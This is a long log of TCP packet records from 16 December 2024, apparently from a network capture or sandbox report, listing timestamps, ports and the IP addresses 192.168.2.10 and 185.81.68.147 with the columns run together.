                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.993665934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.994359970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.994421005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.994488001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.995237112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.995326996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.995347023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.995403051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.996098995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.996207952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.996273994 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.996968985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.997100115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.997165918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.997872114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.997984886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.998054981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.998749971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.998859882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.998910904 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:59.999598980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.043380976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.138154030 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.145951986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.145970106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.146070004 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.146317959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.146416903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.146575928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.147161007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.147305965 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.147371054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.148062944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.148117065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.148194075 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.149009943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.149024010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.149090052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.149859905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.149873018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.149947882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.150732994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.150748014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.150825977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.151537895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.151787043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.151865959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.152509928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.152523994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.152587891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.153359890 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.153373003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.153476954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.154256105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.154268026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.154361010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.154995918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.155154943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.155219078 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.155881882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.156754017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.156766891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.156836033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.156961918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.157080889 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.157705069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.157716990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.157789946 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.158535004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.158649921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.158716917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.159425020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.159662962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.159735918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.160389900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.160547018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.160619020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.161192894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.161336899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.161400080 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.162070036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.162368059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.162421942 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.163209915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.163542032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.163611889 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.163921118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.163933992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.164000034 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.164781094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.164793968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.164860964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.165556908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.166480064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.166491032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.166502953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.166558981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.166615963 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.167295933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.167395115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.167459011 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.168124914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.168175936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.168246984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.169110060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.169121027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.169195890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.169883966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.170006990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.170140982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.170809031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.170821905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.170896053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.171768904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.171781063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.171854019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.172514915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.172656059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.172827959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.173428059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.173602104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.173675060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.174309015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.174499989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.174575090 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.175174952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.175363064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.175507069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.176069021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.176434040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.176501036 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.176948071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.177035093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.177125931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.177884102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.177896023 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.178010941 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.178656101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.178800106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.178875923 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.179563999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.179611921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.179747105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.180428982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.180660963 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.180814028 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.181361914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.181400061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.181512117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.182214975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.182593107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.182667971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.183104038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.183116913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.183182001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.184022903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.184035063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.184119940 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.184791088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.184930086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.184995890 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.185725927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.185784101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.185873032 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.186590910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.186657906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.186831951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.187406063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.187519073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.187592983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.188365936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.188405037 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.188471079 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.189194918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.189336061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.189400911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.190156937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.190171003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.190239906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.190946102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.191201925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.191289902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.191757917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.246529102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.257956028 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.338121891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.338143110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.338222027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.338491917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.338718891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.338968992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.339394093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.339464903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.339648962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.340251923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.340792894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.340894938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.343233109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.343280077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.343293905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.343300104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.343306065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.343328953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.343359947 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.343462944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.344151974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.344163895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.344223976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.344932079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.345073938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.345123053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.345982075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.345993042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.346050024 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.346553087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.346565008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.346616030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.347625017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.347636938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.347692013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.348507881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.348520041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.348819017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.349015951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.349313021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.349415064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.350012064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.350117922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.350317955 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.350928068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.351099014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.351155996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.351785898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.352459908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.352519035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.352798939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.352811098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.352869034 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.353909016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.353920937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.353995085 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.354859114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.354871035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.354959965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.355668068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.355679989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.355729103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.356040955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.356326103 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.356386900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.357104063 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.357115984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.357167959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.357969046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.357983112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.358038902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.358891010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.358903885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.358959913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.359699011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.359827995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.359925985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.360758066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.360769987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.360831976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.361402988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.361417055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.361478090 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.362231016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.362355947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.362410069 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.363246918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.363370895 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.363523006 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.364172935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.364186049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:00.364237070 CET4972380192.168.2.10185.81.68.147
